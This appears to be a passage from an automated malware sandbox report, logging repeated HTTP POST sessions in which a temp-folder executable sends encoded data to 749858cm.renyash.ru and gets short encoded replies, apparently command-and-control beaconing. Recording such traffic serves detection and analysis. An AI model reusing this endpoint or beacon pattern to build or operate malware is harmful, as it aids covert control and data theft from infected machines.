Dec 17, 2024 00:08:18.384047985 CET	948	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g5mZD6Os1eAl%2FFI1zRMslvkL4vEKEWqNsyBySuJgvHq3NJ5GGqVSkdrjpnjFZh20Vq8BqaN34zrJDyFxreHohlDagDXhGuVte%2B41LNlsQBragZjOv8u4JhCioZmuiDzBejhrQk3Y"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3255a41eeb80d0-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4163&min_rtt=1475&rtt_var=5930&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2226&delivery_rate=63527&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0e 1a 39 51 30 3d 0b 07 37 3d 24 0e 2a 06 24 10 26 20 21 5d 3b 3c 38 42 31 0d 2e 5a 32 0b 26 00 32 42 2c 04 37 32 34 12 30 32 30 1e 26 27 23 5d 01 1b 27 44 24 00 3a 5c 2b 3f 22 59 33 0e 2e 46 26 07 28 1a 27 34 2b 0c 31 1d 02 0e 22 38 04 1e 2f 21 3d 04 2b 2c 20 01 2e 56 26 02 34 2e 21 52 0d 13 21 0b 33 38 03 03 27 0f 30 01 21 33 3c 04 35 0a 30 0e 24 12 28 0b 26 03 23 04 24 3f 2a 1d 25 28 0e 01 2a 06 03 0b 23 1c 2c 57 28 3e 20 52 2c 05 20 50 04 35 54 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 989Q0=7=$$& !];<8B1.Z2&2B,724020&'#]'D$:\+?"Y3.F&('4+1"8/!=+, .V&4.!R!38'0!3<50$(&#$?%(*#,W(> R, P5TS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49809	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:18.580462933 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue
Dec 17, 2024 00:08:18.929481030 CET	1060	OUT	Data Raw: 58 54 43 5d 59 5c 51 5e 5d 5a 59 53 57 5c 5a 53 5a 53 5f 5c 51 5e 52 45 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XTC]Y\Q^]ZYSW\ZSZS_\Q^RE]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y Y?=?.#\'0(%=$ +-:#Y<;3%>=&"7?X("F"#Y
Dec 17, 2024 00:08:19.665416956 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:19.918865919 CET	797	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6LZ%2Fn2B7M9gQ56HjdN3EAs1ORUYyru2h%2FaV4HmD8Sr77BemsaV52jDChBwdYG30tdNp8g3d9PHl6kthpfKfTKDRYWKJBEie3DihwhakcDMVgD1m2F7%2F3s43Vqo5mfDW1hLU16jhe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3255ade9e97c6a-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=8763&min_rtt=1975&rtt_var=14317&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1326&delivery_rate=25940&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a Data Ascii: 4<R@X
Dec 17, 2024 00:08:20.111166000 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49812	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:20.360421896 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:20.755136013 CET	1060	OUT	Data Raw: 5d 52 43 50 59 59 51 59 5d 5a 59 53 57 5c 5a 57 5a 56 5f 5b 51 5f 52 46 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]RCPYYQY]ZYSW\ZWZV_[Q_RF]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y Y?<>=]3V4_$[3[ ;-X?;($!2R(=6 Z(("F"#Y
Dec 17, 2024 00:08:21.445103884 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:21.683435917 CET	797	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uAQsnIkv643TlkPWM8wcbgAKRUDpco7MQZBOzOfx8HheeQpYgnkPt7%2BDyp1h5xVdAPSsfmRO1bDD70zQhucqZrk0HSPqttt2MwcQ1ss5eOjqMBra2wSsgXURKbFDFOwGGw9Xn6v5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3255b909e318c4-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4583&min_rtt=1512&rtt_var=6709&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=55975&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49818	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:21.921912909 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue
Dec 17, 2024 00:08:22.273111105 CET	1060	OUT	Data Raw: 58 56 43 52 59 5f 51 5e 5d 5a 59 53 57 5f 5a 56 5a 55 5f 5e 51 59 52 48 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XVCRY_Q^]ZYSW_ZVZU_^QYRH]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y ?*S=';'=#_4(9?)(+S%&S).#/Z(("F"#Y 4
Dec 17, 2024 00:08:23.029273033 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:23.270961046 CET	802	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bbJhYprBBfZVtufD8fS8AqGNu%2FNJ%2FXdI1rB3cwSOrrI%2Bnne9xfV015FgOY7Q5U9T4EgA5c5bomTeWuMB374dhp4DQ2D090BzAJMxnAtVi0kTfDUgd4AhNCiEoGBwpQ6w7biSdsX5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3255c2ed5c330c-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=9048&min_rtt=1954&rtt_var=14922&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1326&delivery_rate=24866&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49825	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:23.517972946 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:23.866837978 CET	1060	OUT	Data Raw: 58 5b 43 55 59 5c 54 58 5d 5a 59 53 57 52 5a 52 5a 5f 5f 5e 51 53 52 46 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: X[CUY\TX]ZYSWRZRZ__^QSRF]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#(,)=-'% ;0=$":9: ((7V2.T>=! 7'Y(("F"#Y
Dec 17, 2024 00:08:24.603388071 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:24.845994949 CET	805	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W%2FECVjGRJKKzc%2FfdA6QXcgzJBdoyXo9TtwsOf7z6k0%2BOXgrbGHHGhhAbOijfLyRMb6qfZcF%2Bq5DHbTXi%2FanwD8FCeXCHBZ0owc54oroa5lZiFW2q2XD8DZB1XbHNARKO7On1GIqw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3255ccc8201851-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4408&min_rtt=1502&rtt_var=6375&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=58987&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49826	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:25.094257116 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue
Dec 17, 2024 00:08:25.445064068 CET	1060	OUT	Data Raw: 5d 51 46 51 59 51 51 5f 5d 5a 59 53 57 58 5a 52 5a 52 5f 5e 51 52 52 45 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]QFQYQQ_]ZYSWXZRZR_^QRRE]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#),!>-#'#'- #)#:?]?(%*=>:47)("F"#Y (
Dec 17, 2024 00:08:26.179301977 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:26.413232088 CET	803	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fbP249evwjQTkhlKJyji7slTFiY5QoiaeU0GefqTWvi15Y%2BTf3O0WDAoKviLOmsYh0OOEkHi%2F16buK2TVt9aIc8F%2B0ZV884p9Va6cTkmY5QRrMoc1%2BulFKQ2s4omoaBOnIkXRhXr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3255d6af6b558a-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4672&min_rtt=1578&rtt_var=6780&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1326&delivery_rate=55443&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49832	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:26.655795097 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue
Dec 17, 2024 00:08:27.007528067 CET	1060	OUT	Data Raw: 58 54 43 52 59 50 51 59 5d 5a 59 53 57 5a 5a 54 5a 50 5f 5b 51 52 52 47 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XTCRYPQY]ZYSWZZTZP_[QRRG]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y [<)=-$04'>?_ \8:(<(,$2:T>X:#$;[*"F"#Y
Dec 17, 2024 00:08:27.785723925 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:28.025120974 CET	802	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BQqN6Sx2Z8MUrhp9j%2FhKXgNM5NK8k6BjsGQMpqHONsQFQCSWkUACvjhXLMw40IbVkMmP31OkIlm7zGrJ2YGirGgjhTmlWMA6jxCH8x9f8z6K%2F%2FjEMAgWuEkTIoJr11mvnzXRm0KU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3255e0afa1433e-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3247&min_rtt=1714&rtt_var=3709&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1326&delivery_rate=104427&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49838	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:28.269031048 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49839	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:28.537292004 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1936 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:28.882961035 CET	1936	OUT	Data Raw: 5d 52 46 54 5c 5c 54 5a 5d 5a 59 53 57 52 5a 5e 5a 5f 5f 5d 51 59 52 49 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]RFT\\TZ]ZYSWRZ^Z__]QYRI]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y Z)<S04\'-##.:;_<+W2T&>9^#Q/(("F"#Y
Dec 17, 2024 00:08:29.622641087 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:29.904422998 CET	952	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z93anzko%2F8UgiDZP7CQ6G1lJpUUmXrvwidiQ5LGKqIGE6maMw5JXOtLfPHQHHbBH40N1VV%2FyBET20DIya%2FB1oVed5PC3LxE1%2BO57nEbKTrQb2P8zrzBTecJkXrOdLelQbzBzdMrK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3255ec2a304339-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4144&min_rtt=1742&rtt_var=5458&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2226&delivery_rate=69653&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0e 1a 39 1d 33 03 0b 06 37 07 2f 51 2a 11 02 53 24 0a 2a 06 2f 59 33 1b 26 1d 0f 02 31 1c 2a 00 25 37 2b 14 23 22 2c 1f 33 0f 30 55 24 27 23 5d 01 1b 27 06 30 10 36 5e 2b 59 2a 13 30 0e 35 19 26 3e 38 18 27 34 20 55 27 30 3f 56 35 01 3a 5b 3b 0c 0f 00 2b 2f 3f 58 2c 23 3d 5b 23 14 21 52 0d 13 22 1b 24 28 07 02 30 0f 23 10 37 0a 2f 5c 36 27 2c 0a 26 2f 2b 50 32 04 2b 04 30 3f 3d 00 27 3b 23 59 3e 01 3a 53 23 21 2f 0f 3c 04 20 52 2c 05 20 50 04 35 54 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98937/QS$/Y3&1%7+#",30U$'#]'06^+Y05&>8'4 U'0?V5:[;+/?X,#=[#!R"$(0#7/\6',&/+P2+0?=';#Y>:S#!/< R, P5TS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49840	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:28.657572985 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:29.007654905 CET	1060	OUT	Data Raw: 5d 52 43 51 59 51 54 59 5d 5a 59 53 57 5a 5a 5e 5a 53 5f 55 51 59 52 41 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]RCQYQTY]ZYSWZZ^ZS_UQYRA]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#?.>-(004\%>#Z4^,#]?<&)!\#*"F"#Y
Dec 17, 2024 00:08:29.758251905 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:30.019820929 CET	801	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q5DQi1Pk81NsqsT3xuqooNfzFDXluqwQFZHb4minlxlTqeMubJjh0WchasYpAcS0w%2FEhoJqi6IVN6%2BfpwtD%2BOpEBRCo0usoiFmJNuTcql05DV0rFD2J3ya1NPDX0xDPkqy4EG5Km"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3255ed0f7e7d11-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=7921&min_rtt=5315&rtt_var=7207&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=55789&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49846	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:30.265206099 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue
Dec 17, 2024 00:08:30.616811037 CET	1060	OUT	Data Raw: 58 54 43 57 59 5c 54 53 5d 5a 59 53 57 5a 5a 53 5a 54 5f 54 51 5c 52 48 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XTCWY\TS]ZYSWZZSZT_TQ\RH]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y _?2-' <Y0>,#9:<+'P%).& '3["F"#Y
Dec 17, 2024 00:08:31.350894928 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:31.600007057 CET	805	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c2y22eD7bSlqj4dpj7cujTQR5%2F3FbcxqZ5xmsN6MP8a9pN49psb0dLrqf3LDFqgojGY78OFoDDm9qoKnvx%2FV%2BpgL0ehm2QKPcqF1Er2qW4OBET2ZKDq1N9%2FxQqZWF5urEjX%2BEdhK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3255f6f9c28c51-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=5220&min_rtt=2065&rtt_var=7085&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1326&delivery_rate=53462&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49849	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:31.844472885 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
